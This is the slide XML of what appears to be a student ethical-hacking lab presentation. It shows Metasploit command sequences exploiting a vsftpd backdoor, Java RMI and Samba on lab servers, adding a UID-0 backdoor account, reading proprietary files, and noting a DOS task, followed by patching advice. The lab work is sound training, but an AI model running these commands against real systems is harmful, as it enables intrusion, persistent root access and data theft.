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9" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="272" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="271" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="277" r:id="rId15"/>
    <p:sldId id="278" r:id="rId16"/>
    <p:sldId id="265" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="268" r:id="rId19"/>
    <p:sldId id="27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263"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0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0A49-A30B-4ADE-FEDC-F660D792F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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Ethical Hacking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D03CF-13CA-0D49-C2F6-3378AE899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5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0ABF6D-F73C-E580-7E98-2243EF4F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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3100" cap="none" dirty="0"/>
              <a:t>Task 5:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3100" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3100" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3100" cap="none" dirty="0"/>
              <a:t>Exploiting the Web server using  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" cap="none" dirty="0"/>
              <a:t>JRMI (Java remote method invocation)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" cap="none" dirty="0"/>
              <a:t>CVE -2018-10611</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" cap="none" dirty="0"/>
              <a:t>CVSS Score 7.5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" cap="none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5E5377-D076-4668-56D3-10A73D02C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2234" y="156312"/>
            <a:ext cx="7898336" cy="5471376"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83075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B6552A-F9B5-8136-26CA-4B87BEE2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9" y="1093787"/>
            <a:ext cx="3585270" cy="4697413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" cap="none" dirty="0"/>
              <a:t>Command lines:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use exploit/multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/java_ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rmi_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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show options</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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use 0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 10.200.0.12</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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run</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600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FA77AD-1824-5C12-810D-AC90E5F91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667" y="902437"/>
            <a:ext cx="7018334" cy="4861776"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411286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58E7B0-3E17-82A4-AE44-A1AC6BE5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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
              <a:t>Task 5:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
              <a:t>Exploiting the Web server with a Samba vulnerable configuration</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" cap="none" dirty="0"/>
              <a:t>CVE -2021-44142</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2000" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" cap="none" dirty="0"/>
              <a:t>CVSS Score 9.9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" cap="none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Content Placeholder 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5A2B0FB-C0D0-1162-AA0C-CC67B2269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8309" y="119786"/>
            <a:ext cx="6827041" cy="6220629"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198900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CFF779-9063-9B26-1FF9-8CD5F166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525107" cy="4697413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" cap="none" dirty="0"/>
              <a:t>Command lines:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4000" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use exploit/multi/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usermap_script</a:t>
            </a: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show options</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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use 0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 10.200.0.12</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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run</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2200" cap="none" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2200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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86FC13AC-E562-9562-83FA-F0EE263DA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459" y="279699"/>
            <a:ext cx="6560441" cy="5977709"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353797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4A2F84-6B48-E823-5385-6073A9C2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cap="none" dirty="0"/>
              <a:t>Task 6:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Creating an account on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" cap="none" dirty="0"/>
              <a:t>Production</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t> Server that has Root permissions</a:t>
            </a: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EB6187E-069A-0684-E1B7-80FA97C3F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2121" y="492021"/>
            <a:ext cx="4974747" cy="63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0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0AAA72-2945-C23B-F2C4-AF3C405F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7" y="1093787"/>
            <a:ext cx="3404297" cy="4697413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" cap="none" dirty="0"/>
              <a:t>Command lines</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" cap="none" dirty="0"/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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 0 –g0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0"/>
              <a:t>(username)</a:t>
            </a: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/>
              <a:t>create password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" cap="none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AD6689C-82B0-3367-705A-625335E48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4146" y="562768"/>
            <a:ext cx="4620571" cy="59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3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D6353C-7EC8-D782-8EBA-4AD895DF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cap="none" dirty="0"/>
              <a:t>Task 7 :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Finding interesting files on the Production server</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" cap="none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561B338-1271-8E73-81C9-A6D44CB7E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4555" y="1093786"/>
            <a:ext cx="6891386" cy="4343401"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11313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282AC0-8941-80EE-16E2-90A0D5CE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sz="3200" cap="none" dirty="0"/>
              <a:t>command lines in the production server</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" cap="none" dirty="0"/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cd/user</a:t>
            </a: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cd Proprietary</a:t>
            </a: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cd Formulas</a:t>
            </a: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ls –al</a:t>
            </a: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cat Texas</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" cap="none" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" cap="none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B8EA2E2-84F9-0545-1016-9F02C7815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2223" y="527050"/>
            <a:ext cx="7488337" cy="4719638"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1405465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5BAF50-060A-631F-BFA5-3CF5BD82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cap="none" dirty="0"/>
              <a:t>Task 7 :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Finding interesting files on the Web servers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:b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38A384-DA4B-34B8-E464-EB50E7669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7855" y="1093788"/>
            <a:ext cx="3906641" cy="4697412"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37794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9DB813-A1B0-FF28-B52E-7F525A6A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sz="3200" cap="none" dirty="0"/>
              <a:t>command lines in the web server server</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0"/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cd /name-jasper</a:t>
            </a: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ls –al</a:t>
            </a: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cat –candidate-list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600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B3F579-21C6-5DA6-B82A-7BA20A042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8757" y="277229"/>
            <a:ext cx="5436973" cy="6537509"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272003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ED3C-293B-7B96-3D32-9EB18DED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A635-2AA0-A5D9-0C39-917FACF6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Production server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine the vulnerabilities of the new Production server and Web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide examples of how any vulnerabilities could be exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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7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6" name="Rectangle 45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B210DB-36C6-E545-C189-BCF28FB2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sz="3300" cap="none" dirty="0"/>
              <a:t>Task 9:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3300" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3300" cap="none" dirty="0"/>
              <a:t>Recommendations to improve server security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 40" descr="Illuminated server room panel">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12E69FDE-80AD-358E-EC08-B15B19F540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75" r="30806" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="356810"/>
            <a:ext cx="4635583" cy="685799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FF63-F62B-7D04-8F16-ED90A6E2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Recommendations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Update the Operating Systems as needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Update applications as needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127274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D25B-6AFC-5E60-73C1-4C0CF76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3300" dirty="0"/>
              <a:t>Task 1: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3300" cap="none" dirty="0"/>
              <a:t>Installing the Production Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" cap="none" dirty="0"/>
              <a:t>virtual machine into the trusted network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D21B0677-ECD9-3B30-A02F-EFB7116F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Download the production server file to the virtual box.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09CD9C-564F-A48B-8567-CAB0206BCD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0" r="11653" b="4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321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A3BAB3-90CF-E950-35E1-5BDE78C7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7" y="1082673"/>
            <a:ext cx="3382179" cy="4708528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Task 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Nmap within Kali Linux to enumerate possible vulnerabilities on the Production server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66917F9-63A6-FB69-0748-91577F7FB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7956" y="939801"/>
            <a:ext cx="6633102" cy="5476874"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194924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9F1F34-F47D-EE11-1FEF-E15892C5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817563"/>
            <a:ext cx="3860548" cy="4889500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" cap="none" dirty="0"/>
              <a:t>Task 3 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en-US" sz="4000" cap="none" dirty="0"/>
              <a:t>Nmap within Kali Linux to enumerate possible vulnerabilities on the Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Content Placeholder 57" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FF66D1-5172-0889-44B4-B009A2037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084" b="3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5852495" y="-91255"/>
            <a:ext cx="4672165" cy="660383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370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11C137-BBA4-9FC9-CEAA-78E4F2E1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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" cap="none" dirty="0"/>
              <a:t>Task 3:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3600" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" cap="none" dirty="0"/>
              <a:t>Exploiting the  Production server using  FTP backdoor and getting root access</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" cap="none" dirty="0"/>
              <a:t>CVE-2011-2523</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3600" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3600" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" cap="none" dirty="0"/>
              <a:t>CVSS Score 9.8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" cap="none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D67AD-146A-B57C-11D4-48387F11E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938" y="1388448"/>
            <a:ext cx="6212506" cy="4375765"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423778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DE797C-204F-B99F-FBDD-D74AE55D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4" y="538162"/>
            <a:ext cx="3059969" cy="4697413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" cap="none" dirty="0"/>
              <a:t>Command lines:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="24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Search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>showoptions</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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Use 0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 192.168.0.18</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" cap="none" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" cap="none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63EC049-354C-7AAD-146A-ADCDFF8A6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938" y="1388448"/>
            <a:ext cx="5832475" cy="4108091"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="287232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F22AE1-64F0-62B3-60BE-A56B4896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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3100" cap="none" dirty="0"/>
              <a:t>Task 4:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3100" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3100" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3100" cap="none" dirty="0"/>
              <a:t>Exploiting the  Production server using a DOS attack</a:t>
            </a:r>
            <a:br>
